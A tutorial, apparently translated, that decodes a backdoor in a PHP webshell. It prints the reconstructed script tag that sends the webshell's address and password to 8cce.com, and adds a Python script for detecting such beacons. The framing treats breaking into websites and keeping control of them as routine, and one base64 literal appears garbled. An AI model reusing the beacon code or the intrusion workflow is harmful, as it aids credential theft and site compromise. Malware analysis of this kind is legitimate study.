Revealing the backdoor in a PHP webshell

Source: Internet
Author: User

This article is intended only for those who still use webshells written by other people.

After gaining access to a website, the usual next step is to upload a webshell and escalate privileges.

However, some people insert a small piece of code into the webshells they distribute, so that the address and password of every webshell you deploy are sent to whoever planted the backdoor.

This code can be long or short. Below I take a PHP webshell I found and decode its backdoor.

First, open the webshell in Notepad. Most of this shell's code is base64-encoded and is only decoded at runtime, so nobody can read the plaintext source directly.

Next comes the decoding. First, change eval to print_r, so that the decoded code is printed instead of executed.

Before decoding, set up a local PHP environment in which the modified file can be run.

Then save and run.

After running it, the underlying code is printed directly, which gives us most of the webshell's source. Some parts of it are still base64-encoded, but these are only short fragments, so a small PHP script is enough to display them:

<?php
print_r(base64_decode('base64-encoded code'));
?>


The first encoded fragment I found is base64_decode('phnjcmlwdcbzcm9j2h0dha6ly8lmzglnjmlnjmlnjulmkulnjmlnkylnkqvjtyzjty1jtcyjtc0lz9jzxj0ptezjnu9').

This fragment is assigned to the $copyurl variable.

Paste the fragment into the small PHP script above and run it.

The page appears blank, but viewing the page source shows a script tag. The part after http:// is percent-encoded and can be recovered with URL decoding.

This is the decoded URL:
<script src='http://8cce.com/cert/?cert=13&u=

Copy this suspicious script fragment into a text file for later.

Earlier in the base64-encoded section I also found base64_decode('Jz48L3NjcmlwdD4='), which is assigned to the variable $copyurll.
Decoding it the same way gives: '></script>

This joins with the previously decoded fragment into one complete script tag:

<script src='http://8cce.com/cert/?cert=13&u='></script>

To find out what this suspicious code is for, we simply search the decoded source for the two variables it is assigned to, $copyurl and $copyurll.

The following are the search results:

echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."";

In this code, $serveru and $serverp are the webshell's address and password respectively.

The complete output of the echo is therefore:
<script src='http://8cce.com/cert/?cert=13&u=[webshell address]&p=[webshell password]'></script>

Combined with the code around the echo, we can see that once the webshell password has been verified as correct, the echoed script tag sends the webshell's address and password to the decoded URL.
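To automate what was done by hand above, here is an added example (my own script, not code from the article or the webshell): it finds base64_decode literals in a PHP source, peels the base64 and percent-encoding layers, and reassembles the echo so the phone-home URL becomes visible. The PHP sample inside is constructed to mirror the shell's structure; its percent-encoded host stands in for the real literal, and $serveru/$serverp are left as placeholders since they only exist at runtime.

```python
import base64
import re
from urllib.parse import unquote

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
ECHO_RE = re.compile(r"echo\s+(.+?);")
PIECE_RE = re.compile(r'"([^"]*)"|\$(\w+)')  # string literal or $variable
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)

# Constructed sample (not the article's shell): the <script> tag is split across
# two base64 literals and the host is percent-encoded, hiding the URL from grep.
FRAG_OPEN = "<script src='http://%38%63%63%65.com/cert/?cert=13&u="
FRAG_CLOSE = "'></script>"
def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()
SAMPLE_PHP = (
    "<?php\n"
    "$copyurl = base64_decode('" + _b64(FRAG_OPEN) + "');\n"
    "$copyurll = base64_decode('" + _b64(FRAG_CLOSE) + "');\n"
    "if ($_POST['pass'] == $password) {\n"
    '    echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."";\n'
    "}\n?>"
)

def peel(blob: str) -> str:
    """Base64-decode one literal, then collapse %XX encoding until stable."""
    text = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    while (unquoted := unquote(text)) != text:
        text = unquoted
    return text

def decode_literals(php_source: str) -> dict[str, str]:
    """Map each variable assigned from base64_decode('...') to its plaintext."""
    return {var: peel(blob) for var, blob in ASSIGN_RE.findall(php_source)}

def reconstruct_echos(php_source: str, decoded: dict[str, str]) -> list[str]:
    """Rebuild each echo's output from decoded fragments; runtime-only values
    such as $serveru and $serverp are left as <name> placeholders."""
    outputs = []
    for stmt in ECHO_RE.findall(php_source):
        pieces = [decoded.get(v, "<" + v + ">") if v else lit
                  for lit, v in PIECE_RE.findall(stmt)]
        outputs.append("".join(pieces))
    return outputs

def beacon_urls(php_source: str) -> list[str]:
    """Phone-home URLs visible only after peeling and reassembling the echo."""
    decoded = decode_literals(php_source)
    return [u for out in reconstruct_echos(php_source, decoded)
            for u in URL_RE.findall(out)]
```

Running beacon_urls on a shell's source lists every URL that only appears after the layers are peeled, which is the quickest way to spot this kind of credential leak before deploying a shell.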

The decoding above shows that this webshell has had a backdoor inserted into it; of course, there may be more than this one.

So in future, before using a webshell, first check whether it has been backdoored. Otherwise the sites you compromise can easily be accessed by others, who will control them through your own webshell.
